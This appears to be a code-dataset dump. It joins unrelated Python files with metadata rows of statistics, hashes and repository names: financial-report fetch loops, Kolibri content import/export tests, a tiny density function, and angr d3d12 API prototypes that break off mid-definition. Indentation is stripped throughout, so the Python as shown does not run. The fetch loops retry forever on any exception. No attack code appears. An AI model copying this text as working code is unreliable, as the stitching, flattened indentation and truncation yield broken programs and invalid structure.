end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self._change_order(table_name, pd.concat([
self.query("cashflow_vip", period=date,
report_type=1, fields=fields),
self.query("cashflow_vip", period=date,
report_type=2, fields=fields),
self.query("cashflow_vip", period=date,
report_type=3, fields=fields),
self.query("cashflow_vip", period=date,
report_type=4, fields=fields),
self.query("cashflow_vip", period=date,
report_type=5, fields=fields),
self.query("cashflow_vip", period=date,
report_type=6, fields=fields),
self.query("cashflow_vip", period=date,
report_type=7, fields=fields),
self.query("cashflow_vip", period=date,
report_type=8, fields=fields),
self.query("cashflow_vip", period=date,
report_type=9, fields=fields),
self.query("cashflow_vip", period=date,
report_type=10, fields=fields),
self.query("cashflow_vip", period=date,
report_type=11, fields=fields),
self.query("cashflow_vip", period=date,
report_type=12, fields=fields)
], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_income_forecasts(self, fill_controller):
table_name = 'INCOME_FORECASTS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("forecast_vip", period=date, fields=fields).reset_index(drop=True).fillna('NULL')
next_data = self._change_order(table_name, next_data)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_financial_indicators(self, fill_controller):
table_name = 'FINANCIAL_INDICATORS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("fina_indicator_vip", period=date, fields=fields).reset_index(drop=True).fillna('NULL')
next_data = self._change_order(table_name, next_data)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
| 83.725877 | 2,723 | 0.669321 | 5,248 | 38,179 | 4.383956 | 0.110518 | 0.02434 | 0.030599 | 0.040162 | 0.929282 | 0.914809 | 0.904377 | 0.889903 | 0.870605 | 0.864737 | 0 | 0.003418 | 0.210666 | 38,179 | 455 | 2,724 | 83.90989 | 0.760021 | 0.018413 | 0 | 0.668293 | 0 | 0.017073 | 0.468274 | 0.241157 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05122 | false | 0 | 0.014634 | 0.019512 | 0.139024 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2af61c21b0b6b9dcfb4459690a51f57ea18cb47b | 19,925 | py | Python | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | import os
import tempfile
from django.core.management import call_command
from django.test import TestCase
from mock import call
from mock import patch
from requests.exceptions import ConnectionError
from requests.exceptions import HTTPError
from kolibri.core.content.models import LocalFile
from kolibri.utils.tests.helpers import override_option
@patch('kolibri.core.content.management.commands.importchannel.channel_import.import_channel_from_local_db')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.start_progress')
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ImportChannelTestCase(TestCase):
"""
Test case for the importchannel management command.
"""
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_url')
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.importchannel.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.cancel', return_value=True)
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.is_cancelled', return_value=True)
def test_remote_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock, start_progress_mock,
import_channel_mock):
local_path = tempfile.mkstemp()[1]
local_path_mock.return_value = local_path
remote_path_mock.return_value = 'notest'
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importchannel", "network", self.the_channel_id)
# Check that is_cancelled was called
is_cancelled_mock.assert_called_with()
# Check that the FileDownload initiated
FileDownloadMock.assert_called_with('notest', local_path)
# Check that cancel was called
cancel_mock.assert_called_with()
# Test that import channel cleans up database file if cancelled
self.assertFalse(os.path.exists(local_path))
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.importchannel.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.cancel', return_value=True)
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock, import_channel_mock):
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_dest_path, local_src_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importchannel", "disk", self.the_channel_id, tempfile.mkdtemp())
# Check that is_cancelled was called
is_cancelled_mock.assert_called_with()
# Check that the FileCopy initiated
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
# Check that cancel was called
cancel_mock.assert_called_with()
# Test that import channel cleans up database file if cancelled
self.assertFalse(os.path.exists(local_dest_path))
@patch('kolibri.core.content.management.commands.importcontent.annotation')
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ImportContentTestCase(TestCase):
"""
Test case for the importcontent management command.
"""
fixtures = ['content_test.json']
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
def setUp(self):
LocalFile.objects.update(available=False)
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', return_value=True)
def test_remote_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileDownloadMock, annotation_mock):
# Check behaviour if cancellation is called before any file download starts
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
is_cancelled_mock.assert_has_calls([call(), call()])
FileDownloadMock.assert_not_called()
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_remote_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock, start_progress_mock,
annotation_mock):
# If transfer is cancelled during transfer of first file
local_path = tempfile.mkstemp()[1]
local_path_mock.return_value = local_path
remote_path_mock.return_value = 'notest'
# Mock this __iter__ so that the filetransfer can be looped over
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
# is_cancelled should be called thrice.
is_cancelled_mock.assert_has_calls([call(), call(), call()])
# Should be set to the local path we mocked
FileDownloadMock.assert_called_with('notest', local_path)
# Check that it was cancelled when the command was cancelled, this ensures cleanup
FileDownloadMock.assert_has_calls([call().cancel()])
# Check that the command itself was also cancelled.
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled',
side_effect=[False, False, False, False, False, True, True, True])
def test_remote_cancel_after_file_copy_file_not_deleted(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock,
start_progress_mock, annotation_mock):
# If transfer is cancelled after transfer of first file
local_path_1 = tempfile.mkstemp()[1]
local_path_2 = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_path_1, local_path_2]
remote_path_mock.return_value = 'notest'
# Mock this __iter__ so that the filetransfer can be looped over
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
# Check that the command itself was also cancelled.
cancel_mock.assert_called_with()
# Check that the temp file we created where the first file was being downloaded to has not been deleted
self.assertTrue(os.path.exists(local_path_1))
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileCopyMock, annotation_mock):
# Local version of test above
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "disk", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call()])
FileCopyMock.assert_not_called()
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock, annotation_mock):
# Local version of test above
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_dest_path, local_src_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "disk", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call(), call()])
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
FileCopyMock.assert_has_calls([call().cancel()])
cancel_mock.assert_called_with()
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.len')
@patch('kolibri.core.content.utils.transfer.Transfer.next', side_effect=ConnectionError('connection error'))
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_remote_cancel_during_connect_error(self, is_cancelled_mock, cancel_mock, next_mock, len_mock, annotation_mock):
call_command('importcontent', 'network', self.the_channel_id, node_ids=['32a941fb77c2576e8f6b294cde4c3b0c'])
cancel_mock.assert_called_with()
len_mock.assert_not_called()
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
def test_remote_import_httperror_404(self, path_mock, logging_mock, start_progress_mock, annotation_mock):
local_dest_path_1 = tempfile.mkstemp()[1]
local_dest_path_2 = tempfile.mkstemp()[1]
local_dest_path_3 = tempfile.mkstemp()[1]
path_mock.side_effect = [local_dest_path_1, local_dest_path_2, local_dest_path_3]
call_command('importcontent', 'network', self.the_channel_id, node_ids=['2b6926ed22025518a8b9da91745b51d3'], renderable_only=False)
self.assertTrue(logging_mock.call_count == 3)
self.assertTrue('404' in logging_mock.call_args_list[0][0][0])
@patch('kolibri.core.content.management.commands.importcontent.sleep')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, False, True, True, True])
def test_remote_import_httperror_502(self, is_cancelled_mock, cancel_mock, url_mock, logging_mock, sleep_mock, annotation_mock):
url_mock.return_value = 'http://httpbin.org/status/502'
call_command('importcontent', 'network', self.the_channel_id)
cancel_mock.assert_called_with()
annotation_mock.set_availability.assert_called()
sleep_mock.assert_called_once()
self.assertTrue('502' in logging_mock.call_args_list[0][0][0])
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
def test_remote_import_httperror_500(self, url_mock, logging_mock, annotation_mock):
url_mock.return_value = 'http://httpbin.org/status/500'
with self.assertRaises(HTTPError):
call_command('importcontent', 'network', self.the_channel_id)
self.assertTrue('500' in logging_mock.call_args_list[0][0][0])
annotation_mock.set_availability.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True])
def test_local_import_oserror_dne(self, is_cancelled_mock, cancel_mock, path_mock, logging_mock, start_progress_mock, annotation_mock):
dest_path = tempfile.mkstemp()[1]
path_mock.side_effect = [dest_path, '/test/dne']
call_command('importcontent', 'disk', self.the_channel_id, 'destination')
self.assertTrue('No such file or directory' in logging_mock.call_args_list[0][0][0])
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.utils.transfer.os.path.getsize')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
def test_local_import_oserror_permission_denied(self, path_mock, getsize_mock, logging_mock, annotation_mock):
dest_path = tempfile.mkstemp()[1]
path_mock.side_effect = [dest_path, '/test/dne']
getsize_mock.side_effect = ['1', OSError('Permission denied')]
with self.assertRaises(OSError):
call_command('importcontent', 'disk', self.the_channel_id, 'destination')
self.assertTrue('Permission denied' in logging_mock.call_args_list[0][0][0])
annotation_mock.assert_not_called()
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ExportChannelTestCase(TestCase):
"""
Test case for the exportchannel management command.
"""
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.exportchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.exportchannel.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.is_cancelled', return_value=True)
def test_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock):
# Make sure we clean up a database file that is canceled during export
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_src_path, local_dest_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportchannel", self.the_channel_id, local_dest_path)
is_cancelled_mock.assert_called_with()
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
cancel_mock.assert_called_with()
self.assertFalse(os.path.exists(local_dest_path))
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ExportContentTestCase(TestCase):
"""
Test case for the exportcontent management command.
"""
fixtures = ['content_test.json']
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.exportcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileCopyMock):
# If cancel comes in before we do anything, make sure nothing happens!
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportcontent", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call()])
FileCopyMock.assert_not_called()
cancel_mock.assert_called_with()
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.exportcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.exportcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock):
# Make sure we cancel during transfer
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_src_path, local_dest_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportcontent", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call(), call()])
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
FileCopyMock.assert_has_calls([call().cancel()])
cancel_mock.assert_called_with()
| 65.114379 | 154 | 0.760703 | 2,402 | 19,925 | 5.993339 | 0.084929 | 0.054251 | 0.088775 | 0.111837 | 0.883509 | 0.860656 | 0.838427 | 0.817033 | 0.756391 | 0.726382 | 0 | 0.010624 | 0.135508 | 19,925 | 305 | 155 | 65.327869 | 0.825138 | 0.07197 | 0 | 0.634454 | 0 | 0 | 0.34601 | 0.307709 | 0 | 0 | 0 | 0 | 0.264706 | 1 | 0.071429 | false | 0 | 0.365546 | 0 | 0.478992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
fa74e7b769e8dc004c94922795a6ee77b28e92f2 | 68 | py | Python | calc.py | kumarpugazhenthi/PetPy | 7466dbe21ed23ef150ad4f60ead929c8f8436ba5 | [
"MIT"
] | null | null | null | calc.py | kumarpugazhenthi/PetPy | 7466dbe21ed23ef150ad4f60ead929c8f8436ba5 | [
"MIT"
] | null | null | null | calc.py | kumarpugazhenthi/PetPy | 7466dbe21ed23ef150ad4f60ead929c8f8436ba5 | [
"MIT"
] | null | null | null | import numpy as np
def density(mass, volume):
return mass/volume
| 11.333333 | 26 | 0.75 | 11 | 68 | 4.636364 | 0.818182 | 0.392157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 68 | 5 | 27 | 13.6 | 0.910714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
fa88a6546d1b4b3c75c4a6fdf84ce3086ce30cd9 | 11,588 | py | Python | angr/procedures/definitions/win32_d3d12.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_d3d12.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_d3d12.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("d3d12.dll")
prototypes = \
{
#
'D3D12SerializeRootSignature': SimTypeFunction([SimTypePointer(SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_DESCRIPTOR", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="D3D_ROOT_SIGNATURE_VERSION"), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pRootSignature", "Version", "ppBlob", "ppErrorBlob"]),
#
'D3D12CreateRootSignatureDeserializer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSrcData", "SrcDataSizeInBytes", "pRootSignatureDeserializerInterface", "ppRootSignatureDeserializer"]),
#
'D3D12SerializeVersionedRootSignature': SimTypeFunction([SimTypePointer(SimStruct({"Version": SimTypeInt(signed=False, label="D3D_ROOT_SIGNATURE_VERSION"), "Anonymous": SimUnion({"Desc_1_0": SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_DESCRIPTOR", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC", pack=False, align=None), "Desc_1_1": SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Flags": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_FLAGS"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE1", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE1", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": 